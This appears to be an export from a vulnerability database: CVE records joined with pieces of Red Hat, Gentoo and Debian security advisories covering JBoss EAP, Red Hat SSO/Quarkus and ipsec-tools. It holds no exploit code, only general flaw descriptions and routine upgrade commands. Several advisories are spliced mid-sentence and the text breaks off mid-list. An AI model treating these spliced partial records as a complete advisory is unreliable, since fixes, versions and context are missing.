CVE-2019-8678: Anthony Lai (@darkfloyd1014) of Knownsec, Ken Wong
(@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a) of Theori, Johnny Yu
(@straight_blast) of VX Browser Exploitation Group, Chris Chan
(@dr4g0nfl4me) of VX Browser Exploitation Group, Phil Mok
(@shadyhamsters) of VX Browser Exploitation Group, Alan Ho (@alan_h0)
of Knownsec, Byron Wai of VX Browser Exploitation, P1umer of ADLab of
Venustech
CVE-2019-8679: Jihui Lu of Tencent KeenLab
CVE-2019-8680: Jihui Lu of Tencent KeenLab
CVE-2019-8681: G |
|
var-202301-0598
|
Unproper laxist permissions on the temporary files used by MIME4J TempFileStorageProvider may lead to information disclosure to other local users. This issue affects Apache James MIME4J version 0.8.8 and prior versions.
We recommend users to upgrade to MIME4j version 0.8.9 or later. Apache James MIME4J There is a vulnerability in plaintext storage of important information.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 7.4.10 on RHEL 7 security update
Advisory ID: RHSA-2023:1512-01
Product: Red Hat JBoss Enterprise Application Platform
Advisory URL: https://access.redhat.com/errata/RHSA-2023:1512
Issue date: 2023-03-29
CVE Names: CVE-2022-1471 CVE-2022-4492 CVE-2022-38752
CVE-2022-41853 CVE-2022-41854 CVE-2022-41881
CVE-2022-45787 CVE-2023-0482 CVE-2023-1108
=====================================================================
1. Summary:
A security update is now available for Red Hat JBoss Enterprise Application
Platform 7.4 for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat JBoss EAP 7.4 for RHEL 7 Server - noarch, x86_64
3. Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java
applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.4.10 serves
as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.9
and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise
Application Platform 7.4.10 Release Notes for information about the most
significant bug fixes and enhancements included in this release.
Security Fix(es):
* SnakeYaml: Constructor Deserialization Remote Code Execution
(CVE-2022-1471)
* hsqldb: Untrusted input may lead to RCE attack (CVE-2022-41853)
* Undertow: Infinite loop in SslConduit during close (CVE-2023-1108)
* undertow: Server identity in https connection is not checked by the
undertow client (CVE-2022-4492)
* snakeyaml: Uncaught exception in java.base/java.util.ArrayList.hashCode
(CVE-2022-38752)
* dev-java/snakeyaml: DoS via stack overflow (CVE-2022-41854)
* codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS
(CVE-2022-41881)
* apache-james-mime4j: Temporary File Information Disclosure in MIME4J
TempFileStorageProvider (CVE-2022-45787)
* RESTEasy: creation of insecure temp files (CVE-2023-0482)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
2129710 - CVE-2022-38752 snakeyaml: Uncaught exception in java.base/java.util.ArrayList.hashCode
2136141 - CVE-2022-41853 hsqldb: Untrusted input may lead to RCE attack
2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution
2151988 - CVE-2022-41854 dev-java/snakeyaml: DoS via stack overflow
2153260 - CVE-2022-4492 undertow: Server identity in https connection is not checked by the undertow client
2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS
2158916 - CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider
2166004 - CVE-2023-0482 RESTEasy: creation of insecure temp files
2174246 - CVE-2023-1108 Undertow: Infinite loop in SslConduit during close
6. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-23572 - (7.4.z) Upgrade jbossws-spi from 3.3.1.Final-redhat-00001 to 3.4.0.Final-redhat-00001
JBEAP-24120 - Tracker bug for the EAP 7.4.10 release for RHEL-7
JBEAP-24172 - (7.4.z) Upgrade jbossws-cxf from 5.4.4.Final-redhat-00001 to 5.4.8.Final-redhat-00001
JBEAP-24182 - (7.4.z) Upgrade wildfly-http-ejb-client from 1.1.13.SP1-redhat-00001 to 1.1.16.Final-redhat-00002
JBEAP-24220 - [GSS](7.4.z) Upgrade JBoss Metadata from 13.0.0.Final-redhat-00001 to 13.4.0.Final-redhat-00001
JBEAP-24254 - JDK17, CLI script to update security doesn't apply to microprofile
JBEAP-24292 - (7.4.z) Upgrade Artemis Native from 1.0.2.redhat-00001 to 1.0.2.redhat-00004
JBEAP-24339 - (7.4.z) Upgrade Undertow from 2.2.22.SP3-redhat-00001 to 2.2.23.SP1
JBEAP-24341 - (7.4.z) Upgrade Ironjacamar from 1.5.10.Final-redhat-00001 to 1.5.11.Final-redhat-00001
JBEAP-24363 - (7.4.z) Upgrade org.jboss.spec.javax.el:jboss-el-api_3.0_spec from 2.0.0.Final-redhat-00001 to 2.0.1.Final
JBEAP-24372 - (7.4.z) Upgrade PicketLink from 2.5.5.SP12-redhat-00011 to 2.5.5.SP12-redhat-00012
JBEAP-24380 - (7.4.z) Upgrade jastow from 2.0.11.Final-redhat-00001 to 2.0.14.Final-redhat-00001
JBEAP-24383 - [GSS](7.4.z) Upgrade artemis-wildfly-integration from 1.0.4 to 1.0.7
JBEAP-24384 - (7.4.z) Upgrade netty from 4.1.77.Final-redhat-00001 to 4.1.86.Final
JBEAP-24385 - (7.4.z) Upgrade WildFly Core from 15.0.22.Final-redhat-00001 to 15.0.23.Final-redhat-00001
JBEAP-24395 - [GSS](7.4.z) Upgrade jboss-ejb-client from 4.0.49.Final-redhat-00001 to 4.0.50.Final
JBEAP-24507 - (7.4.z) RESTEASY-3285 Upgrade resteasy 3.15.x to mime4j 0.8.9
JBEAP-24535 - [GSS](7.4.z) UNDERTOW-2239 - Infinite loop in `SslConduit` during close on JDK 11
JBEAP-24574 - [PST](7.4.z) Upgrade snakeyaml from 1.33.0.redhat-00001 to 1.33.SP1.redhat-00001
JBEAP-24588 - [GSS](7.4.z) RHEL9 rpms: yum groupinstall jboss-eap7 installing JDK11 instead of JDK8 with EAP 7.4 Update 9
JBEAP-24605 - [PST](7.4.z) Upgrade undertow from 2.2.23.SP1-redhat-00001 to 2.2.23.SP2
JBEAP-24618 - (7.4.z) Upgrade WildFly Core from 15.0.23.Final-redhat-00001 to 15.0.25.Final-redhat-00001
7. Package List:
Red Hat JBoss EAP 7.4 for RHEL 7 Server:
Source:
eap7-activemq-artemis-native-1.0.2-3.redhat_00004.1.el7eap.src.rpm
eap7-apache-mime4j-0.8.9-1.redhat_00001.1.el7eap.src.rpm
eap7-artemis-native-1.0.2-4.redhat_00004.1.el7eap.src.rpm
eap7-artemis-wildfly-integration-1.0.7-1.redhat_00001.1.el7eap.src.rpm
eap7-infinispan-11.0.17-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-ironjacamar-1.5.11-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-jboss-ejb-client-4.0.50-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-jboss-el-api_3.0_spec-2.0.1-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-jboss-metadata-13.4.0-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-jboss-server-migration-1.10.0-26.Final_redhat_00025.1.el7eap.src.rpm
eap7-jbossws-cxf-5.4.8-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-jbossws-spi-3.4.0-2.Final_redhat_00001.1.el7eap.src.rpm
eap7-netty-4.1.86-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-netty-transport-native-epoll-4.1.86-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-picketlink-federation-2.5.5-22.SP12_redhat_00012.1.el7eap.src.rpm
eap7-resteasy-3.15.5-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-snakeyaml-1.33.0-2.SP1_redhat_00001.1.el7eap.src.rpm
eap7-undertow-2.2.23-1.SP2_redhat_00001.1.el7eap.src.rpm
eap7-undertow-jastow-2.0.14-1.Final_redhat_00001.1.el7eap.src.rpm
eap7-wildfly-7.4.10-6.GA_redhat_00002.1.el7eap.src.rpm
eap7-wildfly-http-client-1.1.16-1.Final_redhat_00002.1.el7eap.src.rpm
noarch:
eap7-activemq-artemis-native-1.0.2-3.redhat_00004.1.el7eap.noarch.rpm
eap7-apache-mime4j-0.8.9-1.redhat_00001.1.el7eap.noarch.rpm
eap7-artemis-wildfly-integration-1.0.7-1.redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-cachestore-jdbc-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-cachestore-remote-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-client-hotrod-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-commons-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-component-annotations-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-core-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-hibernate-cache-commons-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-hibernate-cache-spi-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-infinispan-hibernate-cache-v53-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-ironjacamar-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-ironjacamar-common-api-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-ironjacamar-common-impl-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-ironjacamar-common-spi-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-ironjacamar-core-api-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-ironjacamar-core-impl-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-ironjacamar-deployers-common-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-ironjacamar-jdbc-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-ironjacamar-validator-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jboss-ejb-client-4.0.50-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jboss-el-api_3.0_spec-2.0.1-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jboss-metadata-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jboss-metadata-appclient-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jboss-metadata-common-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jboss-metadata-ear-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jboss-metadata-ejb-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jboss-metadata-web-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jboss-server-migration-1.10.0-26.Final_redhat_00025.1.el7eap.noarch.rpm
eap7-jboss-server-migration-cli-1.10.0-26.Final_redhat_00025.1.el7eap.noarch.rpm
eap7-jboss-server-migration-core-1.10.0-26.Final_redhat_00025.1.el7eap.noarch.rpm
eap7-jbossws-cxf-5.4.8-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-jbossws-spi-3.4.0-2.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-all-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-buffer-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-dns-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-haproxy-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-http-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-http2-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-memcache-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-mqtt-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-redis-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-smtp-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-socks-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-stomp-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-codec-xml-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-common-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-handler-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-handler-proxy-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-resolver-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-resolver-dns-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-resolver-dns-classes-macos-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-transport-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-transport-classes-epoll-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-transport-classes-kqueue-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-transport-native-unix-common-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-transport-rxtx-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-transport-sctp-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-netty-transport-udt-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-picketlink-api-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm
eap7-picketlink-common-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm
eap7-picketlink-config-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm
eap7-picketlink-federation-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm
eap7-picketlink-idm-api-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm
eap7-picketlink-idm-impl-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm
eap7-picketlink-idm-simple-schema-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm
eap7-picketlink-impl-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm
eap7-resteasy-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-atom-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-cdi-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-client-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-crypto-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-jackson-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-jackson2-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-jaxb-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-jaxrs-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-jettison-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-jose-jwt-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-jsapi-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-json-binding-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-json-p-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-multipart-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-rxjava2-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-spring-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-validator-provider-11-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-resteasy-yaml-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-snakeyaml-1.33.0-2.SP1_redhat_00001.1.el7eap.noarch.rpm
eap7-undertow-2.2.23-1.SP2_redhat_00001.1.el7eap.noarch.rpm
eap7-undertow-jastow-2.0.14-1.Final_redhat_00001.1.el7eap.noarch.rpm
eap7-wildfly-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm
eap7-wildfly-http-client-common-1.1.16-1.Final_redhat_00002.1.el7eap.noarch.rpm
eap7-wildfly-http-ejb-client-1.1.16-1.Final_redhat_00002.1.el7eap.noarch.rpm
eap7-wildfly-http-naming-client-1.1.16-1.Final_redhat_00002.1.el7eap.noarch.rpm
eap7-wildfly-http-transaction-client-1.1.16-1.Final_redhat_00002.1.el7eap.noarch.rpm
eap7-wildfly-java-jdk11-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm
eap7-wildfly-java-jdk8-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm
eap7-wildfly-javadocs-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm
eap7-wildfly-modules-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm
x86_64:
eap7-artemis-native-1.0.2-4.redhat_00004.1.el7eap.x86_64.rpm
eap7-artemis-native-debuginfo-1.0.2-4.redhat_00004.1.el7eap.x86_64.rpm
eap7-artemis-native-wildfly-1.0.2-4.redhat_00004.1.el7eap.x86_64.rpm
eap7-netty-transport-native-epoll-4.1.86-1.Final_redhat_00001.1.el7eap.x86_64.rpm
eap7-netty-transport-native-epoll-debuginfo-4.1.86-1.Final_redhat_00001.1.el7eap.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
8. References:
https://access.redhat.com/security/cve/CVE-2022-1471
https://access.redhat.com/security/cve/CVE-2022-4492
https://access.redhat.com/security/cve/CVE-2022-38752
https://access.redhat.com/security/cve/CVE-2022-41853
https://access.redhat.com/security/cve/CVE-2022-41854
https://access.redhat.com/security/cve/CVE-2022-41881
https://access.redhat.com/security/cve/CVE-2022-45787
https://access.redhat.com/security/cve/CVE-2023-0482
https://access.redhat.com/security/cve/CVE-2023-1108
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/
9. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBZCT+zNzjgjWX9erEAQjgHg/+JaRL/MORx2YrlQ2vSQf3wEHiXL7cSG5b
81HEug+HhLXEzqjRLmFtsqM+eBYFMawokVsOX0PBat7yyJUcwttn7NdO8MlEvrKA
Juh3RHqCSJPE3X5N7OnKTkdJUs7Zxfvmzo6mIly321gjUl51bxl/yVPzXuBiI89S
rPgI1n6wdp4Tb/HDxZ5h2rAX7L8xckVzHnr3ld8MG3Mi2CqrvSnLkYy1YsAxiSrF
Q8tT1dCnCAjUEA2wULxq0a+PrH5cCpkBJ8d6w5Y9lxGKuF1dYzUQAIaDuCvTw4w4
7i5g5Gt3X+/uks/8y00NWxDOTHWnzvlHTT7NWZAtSD1PwknaGQJ4dGPJMUo+Y2Tt
cVuxyhcfQMixEc6+P6EwJrdWuaa6MdU8rceWKFc/a8X//BefU0chSAGi9CfXsC1y
WBR75mfFZleVPRoJtQ0ZLz+Se0rsKwxV9F/FbHlcAhCvaZzbDi2PAHH3YhPqMcmu
JdgRJlT/xBDeZMqb+4U9aiwKox53tuXW7ACUZeN8dlP/pCLiiFFaW0jaObR5zfVy
R51T2b2Lyt7HHkxp/GGXNOfZHjkgYDHGssduzDADhMthLPLJrJb9jQdWRrkjFagt
4agw2EM+/mtBpB4Wcsp1CXb61UfU4jv0O5BPIvHx81l+vqZRKVuICmCb4FI/wnEi
fsWX8UaljMw=
=qlyL
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. Description:
Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak
project, that provides authentication and standards-based single sign-on
capabilities for web and mobile applications. Bugs fixed (https://bugzilla.redhat.com/):
2158916 - CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider
2163533 - CVE-2023-0481 quarkus: insecure permissions on temp files
2166004 - CVE-2023-0482 RESTEasy: creation of insecure temp files
2174854 - CVE-2023-26053 gradle: usage of long IDs for PGP keys is unsafe and is subject to collision attacks
2180886 - CVE-2023-1584 quarkus-oidc: ID and access tokens leak via the authorization code flow
2181977 - CVE-2023-28867 graphql-java: crafted GraphQL query causes stack consumption
2182788 - CVE-2023-1436 jettison: Uncontrolled Recursion in JSONArray
2211026 - CVE-2023-2974 quarkus-core: TLS protocol configured with quarkus.http.ssl.protocols is not enforced, client can enforce weaker supported TLS protocol
5. JIRA issues fixed (https://issues.redhat.com/):
QUARKUS-2672 - Infinispan client is not aligned with newly released Red Hat Data Grid 8.4
QUARKUS-2787 - Rest Data Panache: Correct Open API integration
QUARKUS-2846 - Ensure that new line chars don't break Panache projection
QUARKUS-2978 - ExceptionMapper<WebApplicationException> is not working in DEV mode
QUARKUS-3158 - Do not create session and PKCE encryption keys if only bearer tokens are expected
QUARKUS-3159 - 2.13: Do not support any Origin by default if CORS is enabled
QUARKUS-3161 - Fix security-csrf-prevention.adoc
QUARKUS-3164 - Logging with Panache: fix LocalVariablesSorter usage
QUARKUS-3167 - Make SDKMAN releases minor for maintenance and preview releases
QUARKUS-3168 - Backport Ensure that ConfigBuilder classes work in native mode to 2.13
QUARKUS-3169 - New home for Narayana LRA coordinator Docker images
QUARKUS-3170 - Fix truststore REST Client config when password is not set
QUARKUS-3173 - Reinitialize sun.security.pkcs11.P11Util at runtime
QUARKUS-3174 - Prevent SSE writing from potentially causing accumulation of headers
QUARKUS-3175 - Filter out RESTEasy related warning in ProviderConfigInjectionWarningsTest
QUARKUS-3176 - Make sure parent modules are loaded into workspace before those that depend on them
QUARKUS-3177 - Fix copy paste error in qute docs
QUARKUS-3178 - Pass `--userns=keep-id` to podman only when in rootless mode
QUARKUS-3179 - Fix stuck HTTP2 request when sent challenge has resumed request
QUARKUS-3181 - Make sure quarkus:go-offline properly supports test scoped dependencies
QUARKUS-3184 - Use SchemaType.ARRAY instead of "ARRAY" for native support
QUARKUS-3185 - Simplify logic in create-app.adoc and allow to define stream
QUARKUS-3187 - Allow context propagation for OpenTelemetry
QUARKUS-3188 - Fix RestAssured URL handling and unexpected restarts in QuarkusProdModeTest
QUARKUS-3191 - Drop ':z' bind option when using MacOS and Podman
QUARKUS-3194 - Exclude Netty's reflection configuration files
QUARKUS-3195 - Integrate the api dependency from Infinispan 14 (#ISPN-14268)
QUARKUS-3205 - Missing JARs and other discrepancies related to xpp3 dependency in 2.13.8. The purpose of this text-only
errata is to inform you about the security issues fixed in this release |
|
var-200905-0155
|
Multiple memory leaks in Ipsec-tools before 0.7.2 allow remote attackers to cause a denial of service (memory consumption) via vectors involving (1) signature verification during user authentication with X.509 certificates, related to the eay_check_x509sign function in src/racoon/crypto_openssl.c; and (2) the NAT-Traversal (aka NAT-T) keepalive implementation, related to src/racoon/nattraversal.c. IPsec-Tools is affected by multiple remote denial-of-service vulnerabilities because the software fails to properly handle certain network packets.
A successful attack allows a remote attacker to cause the application to crash or to consume excessive memory, denying further service to legitimate users.
Versions prior to IPsec-Tools 0.7.2 are vulnerable. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200905-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: IPSec Tools: Denial of Service
Date: May 24, 2009
Bugs: #267135
ID: 200905-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple errors in the IPSec Tools racoon daemon might allow remote
attackers to cause a Denial of Service.
Background
==========
The IPSec Tools are a port of KAME's IPsec utilities to the Linux-2.6
IPsec implementation. They include racoon, an Internet Key Exchange
daemon for automatically keying IPsec connections.
* Multiple memory leaks exist in (1) the eay_check_x509sign()
function in racoon/crypto_openssl.c and (2) racoon/nattraversal.c
(CVE-2009-1632).
Impact
======
A remote attacker could send specially crafted fragmented ISAKMP
packets without a payload or exploit vectors related to X.509
certificate authentication and NAT traversal, possibly resulting in a
crash of the racoon daemon.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All IPSec Tools users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-firewall/ipsec-tools-0.7.2"
References
==========
[ 1 ] CVE-2009-1574
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1574
[ 2 ] CVE-2009-1632
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1632
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200905-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA-1804-1 security@debian.org
http://www.debian.org/security/ Nico Golde
May 20th, 2009 http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : ipsec-tools
Vulnerability : null pointer dereference, memory leaks
Problem type : remote
Debian-specific: no
Debian bug : 527634 528933
CVE ID : CVE-2009-1574 CVE-2009-1632
Several remote vulnerabilities have been discovered in racoon, the Internet Key
Exchange daemon of ipsec-tools. The The Common Vulnerabilities and Exposures
project identified the following problems:
Neil Kettle discovered a NULL pointer dereference on crafted fragmented packets
that contain no payload. This results in the daemon crashing which can be used
for denial of service attacks (CVE-2009-1574).
For the oldstable distribution (etch), this problem has been fixed in
version 0.6.6-3.1etch3.
For the stable distribution (lenny), this problem has been fixed in
version 0.7.1-1.3+lenny2.
For the testing distribution (squeeze), this problem will be fixed soon.
For the unstable distribution (sid), this problem has been fixed in
version 1:0.7.1-1.5.
We recommend that you upgrade your ipsec-tools packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Debian (oldstable)
- ------------------
Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3.dsc
Size/MD5 checksum: 722 8b561cf84ac9c46ec07b037ce3ad06f1
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3.diff.gz
Size/MD5 checksum: 49875 7444fb4ad448ccfffe878801a2b88d2e
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_amd64.deb
Size/MD5 checksum: 343790 9cee9f8c479a3a2952d2913d7bdc4c5d
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_amd64.deb
Size/MD5 checksum: 89184 5ccd4554eec28da6d933dc20a8a39393
arm architecture (ARM)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_arm.deb
Size/MD5 checksum: 325706 9ce7988b74bccee252be7dac7ac8b5f7
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_arm.deb
Size/MD5 checksum: 89748 513ded0e4a33200710444e1bf4ab67d8
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_hppa.deb
Size/MD5 checksum: 353066 c56644b426ae945ca420d4ca37fc3f2a
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_hppa.deb
Size/MD5 checksum: 94092 80b46b6fd60e857c84c588432b098957
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_i386.deb
